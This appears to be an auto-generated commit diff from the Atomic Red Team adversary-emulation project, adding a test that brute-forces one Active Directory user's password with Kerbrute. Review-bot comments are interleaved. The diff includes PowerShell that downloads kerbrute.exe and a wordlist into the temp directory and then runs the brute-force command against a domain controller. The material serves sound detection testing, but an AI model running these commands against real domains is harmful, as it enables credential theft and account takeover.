Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2022-09-01 17:47:36 +00:00
parent ff5e8e9415
commit 10a9459b6b
8 changed files with 109 additions and 2 deletions
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -909,6 +909,7 @@ credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of singl
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.001,Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
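Review bot: the new row's test name, "Password Brute User using Kerbrute Tool", does not follow the naming of the sibling T1110.001 rows in this hunk ("Brute Force Credentials of single Azure AD user", "SUDO brute force Debian"). Because this index is generated, the rename belongs in the source test definition; a name that starts with "Brute Force Credentials of single ..." and mentions Kerberos would sort and search with the other entries.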
@@ -647,6 +647,7 @@ lateral-movement,T1021.001,Remote Desktop Protocol,4,Changing RDP Port to Non St
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1555,6 +1555,7 @@
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -1123,6 +1123,7 @@
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -71487,6 +71487,51 @@ credential-access:
'
name: sh
- name: Password Brute User using Kerbrute Tool
auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
description: 'Bruteforce a single user''s password from a wordlist
'
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
default: "$ENV:userdnsdomain"
domain:
description: Domain where you will be testing
type: String
default: "$ENV:userdomain"
dependency_executor_name: powershell
dependencies:
- description: 'kerbrute.exe must exist in $env:temp
'
prereq_command: 'if (test-path $env:temp\kerbrute.exe){exit 0} else {exit
1}
'
get_prereq_command: 'invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe"
-outfile "$env:temp\kerbrute.exe"
'
- description: 'bruteuser.txt must exist in $env:temp
'
prereq_command: 'if (test-path $env:temp\bruteuser.txt){exit 0} else {exit
1}
'
get_prereq_command: 'invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true"
-outfile "$env:temp\bruteuser.txt"
'
executor:
name: powershell
elevation_required: false
command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
-d #{domain} $env:temp\\bruteuser.txt TestUser1 "
T1003:
technique:
x_mitre_platforms:
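Review bot: the `domaincontroller` input is described as "Domain controller where test will be run" but defaults to `$ENV:userdnsdomain`, which holds a DNS domain name rather than a domain controller host, while `domain` defaults to `$ENV:userdomain`, which normally holds the short domain name. Check both defaults against what `--dc` and `-d` expect and align the descriptions with the values actually passed. In the executor `command` the target account `TestUser1` is hard-coded; exposing it as an input argument would let the test be pointed at a dedicated lab account without editing the command.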
@@ -36,6 +36,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
- [Atomic Test #5 - SUDO brute force Redhat](#atomic-test-5---sudo-brute-force-redhat)
- [Atomic Test #6 - Password Brute User using Kerbrute Tool](#atomic-test-6---password-brute-user-using-kerbrute-tool)
<br/>
@@ -319,4 +321,60 @@ yum -y update && yum install -y openssl sudo
<br/>
<br/>
## Atomic Test #6 - Password Brute User using Kerbrute Tool
Bruteforce a single user's password from a wordlist
**Supported Platforms:** Windows
**auto_generated_guid:** 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domaincontroller | Domain controller where test will be run | String | $ENV:userdnsdomain|
| domain | Domain where you will be testing | String | $ENV:userdomain|
#### Attack Commands: Run with `powershell`!
```powershell
cd $env:temp
.\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1
```
#### Dependencies: Run with `powershell`!
##### Description: kerbrute.exe must exist in $env:temp
##### Check Prereq Commands:
```powershell
if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
```
##### Description: bruteuser.txt must exist in $env:temp
##### Check Prereq Commands:
```powershell
if (test-path $env:temp\bruteuser.txt){exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "$env:temp\bruteuser.txt"
```
<br/>
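Review bot: under "Get Prereq Commands", `invoke-webrequest` saves `kerbrute_windows_386.exe` to `$env:temp\kerbrute.exe`, and the matching prereq check is only `test-path`, so any file with that name in the temp directory satisfies it and nothing verifies what was downloaded before the executor runs it. Record the expected SHA-256 of the v1.0.3 release asset and compare it with `Get-FileHash` in the check. The section also lists no cleanup commands, so `kerbrute.exe` and `bruteuser.txt` stay in `$env:temp` after the test.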